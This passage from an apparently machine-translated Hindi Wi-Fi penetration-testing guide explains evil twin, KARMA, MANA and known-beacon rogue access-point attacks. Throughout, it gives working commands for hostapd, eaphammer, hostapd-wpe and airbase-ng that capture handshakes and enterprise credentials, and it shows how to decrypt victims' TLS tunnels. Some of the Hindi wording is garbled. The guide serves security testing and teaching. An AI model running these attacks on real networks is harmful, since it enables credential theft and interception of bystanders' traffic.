ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

और फिर dnsmasq को शुरू करें:

dnsmasq -C dnsmasq.conf -d

होस्टएपीडी

apt-get install hostapd

एक कॉन्फ़िग फ़ाइल hostapd.conf बनाएं:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

चिढ़ाने वाले प्रक्रियाओं को रोकें, मॉनिटर मोड सेट करें, और hostapd शुरू करें:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

फॉरवर्डिंग और पुनर्निर्देशन

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

शैतान जुड़वां

एक शैतान जुड़वां हमला उस तरीके से उपयोग करता है जिसे WiFi क्लाइंट नेटवर्क को पहचानते हैं, मुख्य रूप से नेटवर्क नाम (ESSID) पर निर्भर करते हैं बिना बेस स्टेशन (एक्सेस प्वाइंट) को क्लाइंट को प्रमाणित करने की आवश्यकता न हो। मुख्य बिंदु शामिल हैं:

  • भिन्नता में कठिनाई: डिवाइस वास्तविक और रोग एक्सेस प्वाइंट को भिन्न करने में संघर्ष करते हैं जब वे एक ही ESSID और एन्क्रिप्शन प्रकार साझा करते हैं। वास्तविक दुनिया के नेटवर्क अक्सर विस्तार से कवरेज को बिना रुकावट के बढ़ाने के लिए एक ही ESSID के साथ कई एक्सेस प्वाइंट का उपयोग करते हैं।

  • क्लाइंट रोमिंग और कनेक्शन मेनिपुलेशन: 802.11 प्रोटोकॉल डिवाइस को एक ही ESS के भीतर एक्सेस प्वाइंट्स के बीच रोम करने की अनुमति देता है। हमलावर इसे इस तरह से शातिर बना सकते हैं कि एक डिवाइस को अपने वर्तमान बेस स्टेशन से डिस्कनेक्ट करने और रोग एक्सेस प्वाइंट से कनेक्ट करने के लिए प्रेरित कर सकते हैं। इसे एक मजबूत सिग्नल प्रदान करके या वास्तविक एक्सेस प्वाइंट के साथ कनेक्शन को बाधित करके उपलब्धि प्राप्त की जा सकती है जैसे कि डीऑथेंटिकेशन पैकेट्स या जैमिंग के जैसे तरीकों से।

  • कार्रवाई में चुनौतियां: कई, अच्छे स्थानित एक्सेस प्वाइंट्स वाले पर्यावरण में शैतान जुड़वां हमला सफलतापूर्वक करना चुनौतीपूर्ण हो सकता है। एक वास्तविक एक्सेस प्वाइंट को डीऑथेंटिकेट करना अक्सर उस डिवाइस को एक अन्य वास्तविक एक्सेस प्वाइंट से कनेक्ट करने का परिणाम देता है यदि हमलावर सभी पास के एक्सेस प्वाइंट्स को डीऑथेंटिकेट कर सकता है या रोग एक्सेस प्वाइंट को रणनीतिक रूप से रख सकता है।

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

आप eaphammer का उपयोग करके एक ईविल ट्विन बना सकते हैं (ध्यान दें कि eaphammer के साथ ईविल ट्विन बनाने के लिए इंटरफेस मॉनिटर मोड में नहीं होना चाहिए):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

या Airgeddon का उपयोग करके: विकल्प: 5,6,7,8,9 (ईविल ट्विन हमला मेनू के अंदर)।

कृपया ध्यान दें कि डिफ़ॉल्ट रूप से अगर PNL में एक ESSID को WPA सुरक्षित रूप से सहेजा गया है, तो उपकरण स्वचालित रूप से एक ओपन ईविल ट्विन से कनेक्ट नहीं होगा। आप वास्तविक एपी को डीओएस करने का प्रयास कर सकते हैं और आशा कर सकते हैं कि उपयोगकर्ता आपके ओपन ईविल ट्विन से मैन्युअल रूप से कनेक्ट करें, या आप वास्तविक एपी को डीओएस कर सकते हैं और एक WPA ईविल ट्विन का उपयोग करके हैंडशेक को कैप्चर कर सकते हैं (इस तरीके का उपयोग करके आप पीएसके को नहीं जानते हैं, लेकिन आप हैंडशेक को कैप्चर कर सकते हैं और इसे क्रैक करने की कोशिश कर सकते हैं)।

कुछ ओएस और एवी उपयोगकर्ता को चेतावनी देंगे कि एक ओपन नेटवर्क से कनेक्ट करना खतरनाक है...

WPA/WPA2 ईविल ट्विन

आप WPA/2 का उपयोग करके एक ईविल ट्विन बना सकते हैं और यदि उपकरणों ने WPA/2 के साथ उस SSID से कनेक्ट करने की विन्यासित की है, तो वे कनेक्ट करने की कोशिश करेंगे। फिर भी, 4-वे-हैंडशेक पूरा करने के लिए आपको भी जानना चाहिए कि पासवर्ड क्लायंट का उपयोग करने जा रहा है। यदि आप नहीं जानते हैं, तो कनेक्शन पूरा नहीं होगा

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

एंटरप्राइज ईविल ट्विन

इस हमले को समझने के लिए मैं सुझाव दूंगा कि पहले आप WPA एंटरप्राइज व्याख्या को पढ़ें।

hostapd-wpe का उपयोग

hostapd-wpe को काम करने के लिए एक कॉन्फ़िगरेशन फ़ाइल की आवश्यकता होती है। इन कॉन्फ़िगरेशन को उत्पन्न करने को स्वचालित करने के लिए आप https://github.com/WJDigby/apd_launchpad का उपयोग कर सकते हैं (एक पायथन फ़ाइल को /etc/hostapd-wpe/ के अंदर डाउनलोड करें)

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

विन्यास फ़ाइल में आप कई विभिन्न चीज़ों का चयन कर सकते हैं जैसे कि ssid, चैनल, उपयोगकर्ता फ़ाइलें, क्रेट/कुंजी, dh पैरामीटर, wpa संस्करण और प्रमाणीकरण...

EAP-TLS के साथ hostapd-wpe का उपयोग करके किसी भी प्रमाणपत्र को लॉगिन करने की अनुमति देना।

EAPHammer का उपयोग

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

डिफ़ॉल्ट रूप से, EAPHammer इस प्रमाणीकरण विधियों का उपयोग करता है (प्लेनटेक्स्ट पासवर्ड प्राप्त करने के लिए पहला ट्राई करने के लिए GTC को ध्यान में रखें और फिर अधिक मजबूत प्रमाणीकरण विधियों का उपयोग करें):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

यह डिफ़ॉल्ट मेथडोलॉजी है लंबे कनेक्शन समय से बचने के लिए। हालांकि, आप यह भी निर्दिष्ट कर सकते हैं कि सर्वर को सबसे कमजोर से सबसे मजबूत प्रमाणीकरण विधियों की सेवा करें:

--negotiate weakest

या आप निम्नलिखित भी उपयोग कर सकते हैं:

  • --negotiate gtc-downgrade उच्च प्रदर्शन GTC डाउनग्रेड कार्यान्वयन का उपयोग करने के लिए (सादा पासवर्ड)

  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP मैन्युअल रूप से प्रस्तावित विधियों को निर्दिष्ट करने के लिए (आक्रमण करने वाले संगठन के समान अधिक पहचानी जाने वाली ऑथ मेथड्स को एक ही क्रम में प्रस्तुत करने से आक्रमण को अधिक कठिन बनाया जा सकता है)।

Airgeddon का उपयोग

Airgeddon पहले से उत्पन्न प्रमाणपत्रों का उपयोग कर सकता है ताकि WPA/WPA2-एंटरप्राइज नेटवर्क्स को EAP प्रमाणीकरण प्रदान कर सके। नकली नेटवर्क कनेक्शन प्रोटोकॉल को EAP-MD5 में डाउनग्रेड करेगा ताकि यह उपयोगकर्ता और पासवर्ड का MD5 कैप्चर कर सके। बाद में, हमलावता करने वाला पासवर्ड को क्रैक करने की कोशिश कर सकता है। Airggedon आपको एक निरंतर ईविल ट्विन हमला (शोरगुल) या केवल तब ईविल हमला बनाएं जब कोई कनेक्ट होता है (स्मूथ) की संभावना प्रदान करता है।

Evil Twins हमलों में PEAP और EAP-TTLS TLS टनल्स का डीबगिंग

यह विधि एक PEAP कनेक्शन में परीक्षित की गई थी लेकिन मैं एक अर्बिट्रेरी TLS टनल को डिक्रिप्ट कर रहा हूं इसलिए यह EAP-TTLS के साथ भी काम करना चाहिए

hostapd-wpe की कॉन्फ़िगरेशन में dh_file शामिल लाइन को कमेंट करें (dh_file=/etc/hostapd-wpe/certs/dh से #dh_file=/etc/hostapd-wpe/certs/dh) यह hostapd-wpe को RSA का उपयोग करके कुंजियाँ आदान-प्रदान करने के लिए बनाएगा, इससे आप बाद में ट्रैफिक को डिक्रिप्ट कर सकेंगे सर्वर की निजी कुंजी जानते हुए

अब Evil Twin को उस संशोधित कॉन्फ़िगरेशन के साथ सामान्य रूप से उपयोग करके hostapd-wpe शुरू करें। इसके अलावा, जिस इंटरफेस पर Evil Twin हमला कर रहा है, उसमें wireshark भी शुरू करें।

अब या बाद में (जब आपने पहले से ही कुछ प्रमाणीकरण इरादे कैप्चर कर लिए हों) आप वायरशार्क में निजी RSA कुंजी को जोड़ सकते हैं: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

नए एंट्री जोड़ें और इस मानों को भरें: IP address = कोई भी -- Port = 0 -- Protocol = डेटा -- कुंजी फ़ाइल (अपनी कुंजी फ़ाइल का चयन करें, समस्याओं से बचने के लिए एक कुंजी फ़ाइल का चयन करें जिसमें पासवर्ड से सुरक्षित नहीं है)।

और नए "Decrypted TLS" टैब में देखें:

KARMA, MANA, Loud MANA और जाने गए बीकन हमला

ESSID और MAC काले/सफेद सूची

विभिन्न प्रकार की मीडिया एक्सेस कंट्रोल फ़िल्टर सूची (MFACLs) और उनके संबंधित मोड और एक रोग Access Point (AP) के व्यवहार पर प्रभाव:

  1. MAC आधारित सफेद सूची:

  • रोग AP केवल उन उपकरणों के प्रोब अनुरोधों का जवाब देगा जो सफेद सूची में उल्लिखित हैं, बाकी सभी को अदृश्य रखेगा जो सूची में नहीं हैं।

  1. MAC आधारित काली सूची:

  • रोग AP उन उपकरणों के प्रोब अनुरोधों को नजरअंदाज करेगा जो काली सूची में हैं, इससे विशेष रूप से उन उपकरणों के लिए रोग AP अदृश्य हो जाएगा।

  1. SSID आधारित सफेद सूची:

  • रोग AP केवल उन विशिष्ट ESSIDs के लिए प्रोब अनुरोध का जवाब देगा जो सूची में हैं, जिससे यह उन उपकरणों के लिए अदृश्य हो जाएगा जिनकी प्राथमिक नेटवर्क सूची (PNLs) में वह ESSIDs नहीं हैं।

  1. SSID आधारित काली सूची:

  • रोग AP विशिष्ट ESSIDs के लिए प्रोब अनुरोध का जवाब नहीं देगा, जिससे यह उन उपकरणों के लिए अदृश्य हो जाएगा जो विशेष नेटवर्क की खोज कर रहे हैं।

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

यह विधि एक हमलावादी को एक दुष्ट पहुंच स्थान (AP) बनाने की अनुमति देती है जो सभी प्रोब अनुरोधों का प्रतिक्रिया करता है जो नेटवर्क से कनेक्ट होने की कोशिश कर रहे उपकरणों से। यह तकनीक उपकरणों को धोखा देकर उन्हें हमलावादी के एपी से कनेक्ट करने में मदद करती है जो उपकरण खोज रहे नेटवर्क की नकल करता है। एक बार जब एक उपकरण इस रोग एपी को कनेक्शन अनुरोध भेजता है, यह जोड़ी पूरी होती है, जिससे उपकरण गलती से हमलावादी नेटवर्क से कनेक्ट हो जाता है।

MANA

फिर, उपकरण अनाहित नेटवर्क प्रतिक्रियाओं को नजरअंदाज करने लगे, मूल कर्मा हमले की प्रभावकारिता को कम कर दिया। हालांकि, एक नई विधि, जिसे MANA हमला के रूप में जाना जाता है, इयान डी विलियर्स और डोमिनिक व्हाइट द्वारा पेश किया गया था। इस विधि में दुष्ट एपी उपकरणों के पसंदीदा नेटवर्क सूची (PNL) को दर्शाता है जब उनके ब्रॉडकास्ट प्रोब अनुरोधों का प्रतिक्रिया देकर उनके द्वारा पहले अनुरोधित नेटवर्क नामों (एसएसआईडी) को दर्शाता है। यह विवेकी हमला मूल कर्मा हमले के खिलाफ सुरक्षा को उलटने के द्वारा उपकरणों के द्वारा जाने और प्राथमिकता दी गई नेटवर्कों को शामिल करके काम करता है।

MANA हमला उपकरणों से निर्देशित और ब्रॉडकास्ट प्रोब अनुरोधों का मॉनिटरिंग करके काम करता है। निर्देशित अनुरोधों के लिए, यह उपकरण का मैक पता और अनुरोधित नेटवर्क नाम रिकॉर्ड करता है, और इस जानकारी को एक सूची में जोड़ता है। जब एक ब्रॉडकास्ट अनुरोध प्राप्त होता है, एपी उपकरण की सूची में किसी भी नेटवर्क के साथ मेल खाता है, जिससे उपकरण को हमलावादी एपी से कनेक्ट होने के लिए प्रेरित किया जाता है।

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

ध्वनिपूर्ण माना

ध्वनिपूर्ण माना हमला एक उन्नत रणनीति है जब उपकरण संदर्भित प्रोबिंग का उपयोग नहीं करते हैं या जब उनकी पसंदीदा नेटवर्क सूची (PNL) हमलावादी को अज्ञात होती है। यह उस सिद्धांत पर काम करता है कि एक क्षेत्र में उपकरणों के नेटवर्क नामों में कुछ साझा होने की संभावना है। इसके बजाय चयनात्मक रूप से प्रतिक्रिया देने की बजाय, यह हमला सभी देखे गए उपकरणों की संयुक्त PNLs में पाए गए हर नेटवर्क नाम (ESSID) के लिए प्रोब प्रतिक्रियाएँ प्रसारित करता है। यह व्यापक दृष्टिकोण एक उपकरण को एक परिचित नेटवर्क को पहचानने और रोग एक्सेस प्वाइंट (AP) से कनेक्ट करने की संभावना बढ़ाता है।

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

ज्ञात बीकन हमला

जब ध्वनिपूर्ण MANA हमला पर्याप्त नहीं होता है, तो ज्ञात बीकन हमला एक और दृष्टिकोण प्रस्तुत करता है। इस विधि में किसी भी नेटवर्क नाम का प्रतिक्रिया देने वाले एपी का अनुकरण करके, एक शब्दसूचि से प्राप्त संभावित ESSIDs की सूची के माध्यम से कनेक्शन प्रक्रिया को ब्रूट-फोर्स करता है। यह विक्टिम के PNL में ESSID के साथ मेल खाता है, जिससे झूठी एपी पर कनेक्शन का प्रयास किया जाता है। हमला उपकरणों को फंसाने के लिए इसे --loud विकल्प के साथ मिलाकर बढ़ाया जा सकता है।

Eaphammer ने इस हमला को एक MANA हमला के रूप में लागू किया जहां सभी ESSIDs सूची में शामिल होते हैं (आप इसे --loud के साथ मिलाकर एक Loud MANA + Known beacons हमला बनाने के लिए भी उपयोग कर सकते हैं):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

पता चला बीकन बर्स्ट हमला

पता चला बीकन बर्स्ट हमला में प्रति ESSID सूची में दर्ज किए गए प्रत्येक ESSID के लिए बीकन फ्रेमों का तेजी से प्रसारण शामिल है। इससे एक नकली नेटवर्क के घने वातावरण का निर्माण होता है, जिससे उपकरण रोग AP से कनेक्ट होने की संभावना को बढ़ा दिया जाता है, विशेष रूप से जब यह MANA हमले के साथ मिलाकर किया जाता है। यह तकनीक गति और मात्रा का सहारा लेती है ताकि उपकरणों के नेटवर्क चयन तंत्रों को अधिकाधिक कर दिया जा सके।

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct एक प्रोटोकॉल है जो उपकरणों को एक दूसरे के साथ सीधे Wi-Fi का उपयोग करके बिना पारंपरिक वायरलेस एक्सेस प्वाइंट की आवश्यकता के बिना संबंधित करता है। यह क्षमता विभिन्न इंटरनेट ऑफ थिंग्स (IoT) उपकरणों में एकीकृत है, जैसे प्रिंटर और टेलीविजन, जो सीधे उपकरण-से-उपकरण संचार को सुविधाजनक बनाते हैं। Wi-Fi Direct की एक महत्वपूर्ण विशेषता यह है कि एक उपकरण एक एक्सेस प्वाइंट की भूमिका लेता है, जिसे समूह मालिक के रूप में जाना जाता है, ताकि कनेक्शन का प्रबंधन किया जा सके।

Wi-Fi Direct कनेक्शनों के लिए सुरक्षा Wi-Fi Protected Setup (WPS) के माध्यम से स्थापित की जाती है, जो सुरक्षित पेयरिंग के लिए कई विधियों का समर्थन करता है, जैसे:

  • पुश-बटन कॉन्फ़िगरेशन (PBC)

  • पिन एंट्री

  • नियर-फ़ील्ड संचार (NFC)

ये विधियाँ, विशेष रूप से पिन एंट्री, वापसी वायरलेस नेटवर्क्स में WPS के समान सुरक्षा दोषों के लिए संवेदनशील हैं, जिन्हें इसी तरह के हमले के लक्ष्य के रूप में बनाया गया है।

EvilDirect Hijacking

EvilDirect Hijacking Wi-Fi Direct के लिए विशिष्ट एक हमला है। यह एक Evil Twin हमले की अवधारणा का प्रतिबिम्ब है लेकिन Wi-Fi Direct कनेक्शनों को लक्ष्य बनाता है। इस परिदृश्य में, एक हमलावर एक वैध समूह मालिक का भूमिका अभिनय करता है जिसका उद्देश्य उपकरणों को एक दुरुपयोगी संगठन से कनेक्ट करने में धोखा देना है। इस विधि को airbase-ng जैसे उपकरणों का उपयोग करके कार्यान्वित किया जा सकता है, जिसमें नकली उपकरण के चैनल, ईएसएसआईडी, और MAC पता निर्दिष्ट किया जाता है:

Last updated